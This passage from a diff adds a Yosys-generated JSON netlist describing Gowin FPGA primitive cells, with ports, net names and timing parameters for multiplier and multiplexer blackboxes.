"c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1311.15-1311.20" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1309.14-1309.19" + } + } + } + }, + "MULTALU36X18": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1244.1-1267.10" + }, + "parameter_default_values": { + "ACCLOAD_REG0": "0", + "ACCLOAD_REG1": "0", + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "CREG": "0", + "C_ADD_SUB": "0", + "MULTALU36X18_MODE": "00000000000000000000000000000000", + "MULT_RESET_MODE": "SYNC", + "OUT_REG": "0", + "PIPE_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "B": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + }, + "C": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 110 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 111 ] + }, + "ACCLOAD": { + "direction": "input", + "bits": [ 112 ] + }, + "CE": { + "direction": "input", + "bits": [ 113 ] + }, + "CLK": { + "direction": "input", + "bits": [ 114 ] + }, + "RESET": { + "direction": "input", + "bits": [ 115 ] + }, + "CASI": { + "direction": "input", + "bits": [ 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224 ] + }, + "CASO": { + "direction": "output", + "bits": [ 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1245.15-1245.16" + } + }, + "ACCLOAD": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1248.20-1248.27" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1248.8-1248.13" + } + }, + "B": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1246.15-1246.16" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1248.14-1248.19" + } + }, + "C": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1247.15-1247.16" + } + }, + "CASI": { + "hide_name": 0, + "bits": [ 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1252.15-1252.19" + } + }, + "CASO": { + "hide_name": 0, + "bits": [ 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1254.15-1254.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 113 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1249.8-1249.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 114 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1250.8-1250.11" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1253.15-1253.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 115 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1251.8-1251.13" + } + } + } + }, + "MUX16": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:39.1-43.10" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "I6": { + "direction": "input", + "bits": [ 8 ] + }, + "I7": { + "direction": "input", + "bits": [ 9 ] + }, + "I8": { + "direction": "input", + "bits": [ 10 ] + }, + "I9": { + "direction": "input", + "bits": [ 11 ] + }, + "I10": { + "direction": "input", + "bits": [ 12 ] + }, + "I11": { + "direction": "input", + "bits": [ 13 ] + }, + "I12": { + "direction": "input", + "bits": [ 14 ] + }, + "I13": { + "direction": "input", + "bits": [ 15 ] + }, + "I14": { + "direction": "input", + "bits": [ 16 ] + }, + "I15": { + "direction": "input", + "bits": [ 17 ] + }, + "S0": { + "direction": "input", + "bits": [ 18 ] + }, + "S1": { + "direction": "input", + "bits": [ 19 ] + }, + "S2": { + "direction": "input", + "bits": [ 20 ] + }, + "S3": { + "direction": "input", + "bits": [ 21 ] + }, + "O": { + "direction": "output", + "bits": [ 22 ] + } + }, + "cells": { + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.7-40.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.11-40.13" + } + }, + "I10": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.47-40.50" + } + }, + "I11": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.52-40.55" + } + }, + "I12": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.57-40.60" + } + }, + "I13": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.62-40.65" + } + }, + "I14": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.67-40.70" + } + }, + "I15": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.72-40.75" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.15-40.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.19-40.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.23-40.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.27-40.29" + } + }, + "I6": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.31-40.33" + } + }, + "I7": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.35-40.37" + } + }, + "I8": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.39-40.41" + } + }, + "I9": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:40.43-40.45" + } + }, + "O": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:42.8-42.9" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:41.7-41.9" + } + }, + "S1": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:41.11-41.13" + } + }, + "S2": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:41.15-41.17" + } + }, + "S3": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:41.19-41.21" + } + } + } + }, + "MUX2": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:99.1-111.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "S0": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$60": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000010100000", + "T_FALL_MIN": "00000000000000000000000010100000", + "T_FALL_TYP": "00000000000000000000000010100000", + "T_RISE_MAX": "00000000000000000000000010001101", + "T_RISE_MIN": "00000000000000000000000010001101", + "T_RISE_TYP": "00000000000000000000000010001101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:105.3-105.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$61": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000010100000", + "T_FALL_MIN": "00000000000000000000000010100000", + "T_FALL_TYP": "00000000000000000000000010100000", + "T_RISE_MAX": "00000000000000000000000010001101", + "T_RISE_MIN": "00000000000000000000000010001101", + "T_RISE_TYP": "00000000000000000000000010001101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:106.3-106.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$62": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001010101000", + "T_FALL_MIN": "00000000000000000000001010101000", + "T_FALL_TYP": "00000000000000000000001010101000", + "T_RISE_MAX": "00000000000000000000000111100110", + "T_RISE_MIN": "00000000000000000000000111100110", + "T_RISE_TYP": "00000000000000000000000111100110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:107.3-107.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:100.9-100.11" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:100.12-100.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:102.10-102.11" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:101.9-101.11" + } + } + } + }, + "MUX2_LUT5": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:113.1-125.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "S0": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$63": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000010100000", + "T_FALL_MIN": "00000000000000000000000010100000", + "T_FALL_TYP": "00000000000000000000000010100000", + "T_RISE_MAX": "00000000000000000000000010001101", + "T_RISE_MIN": "00000000000000000000000010001101", + "T_RISE_TYP": "00000000000000000000000010001101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:119.3-119.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$64": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000010100000", + "T_FALL_MIN": "00000000000000000000000010100000", + "T_FALL_TYP": "00000000000000000000000010100000", + "T_RISE_MAX": "00000000000000000000000010001101", + "T_RISE_MIN": "00000000000000000000000010001101", + "T_RISE_TYP": "00000000000000000000000010001101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:120.3-120.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$65": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001010101000", + "T_FALL_MIN": "00000000000000000000001010101000", + "T_FALL_TYP": "00000000000000000000001010101000", + "T_RISE_MAX": "00000000000000000000000111100110", + "T_RISE_MIN": "00000000000000000000000111100110", + "T_RISE_TYP": "00000000000000000000000111100110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:121.3-121.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:114.9-114.11" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:114.12-114.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:116.10-116.11" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:115.9-115.11" + } + } + } + }, + "MUX2_LUT6": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:127.1-139.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "S0": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$66": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:133.3-133.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$67": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:134.3-134.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$68": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:135.3-135.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:128.9-128.11" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:128.12-128.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:130.10-130.11" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:129.9-129.11" + } + } + } + }, + "MUX2_LUT7": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:141.1-153.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "S0": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$69": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:147.3-147.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$70": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:148.3-148.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$71": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001011010011", + "T_FALL_MIN": "00000000000000000000001011010011", + "T_FALL_TYP": "00000000000000000000001011010011", + "T_RISE_MAX": "00000000000000000000000111011110", + "T_RISE_MIN": "00000000000000000000000111011110", + "T_RISE_TYP": "00000000000000000000000111011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:149.3-149.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:142.9-142.11" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:142.12-142.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:144.10-144.11" + } + }, + "S0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:143.9-143.11" + } + } + } + }, + "MUX2_LUT8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:155.1-167.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "S0": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$72": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:161.3-161.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$73": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000011111111", + "T_FALL_MIN": "00000000000000000000000011111111", + "T_FALL_TYP": "00000000000000000000000011111111", + "T_RISE_MAX": "00000000000000000000000010001000", + "T_RISE_MIN": "00000000000000000000000010001000", + "T_RISE_TYP": "00000000000000000000000010001000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": 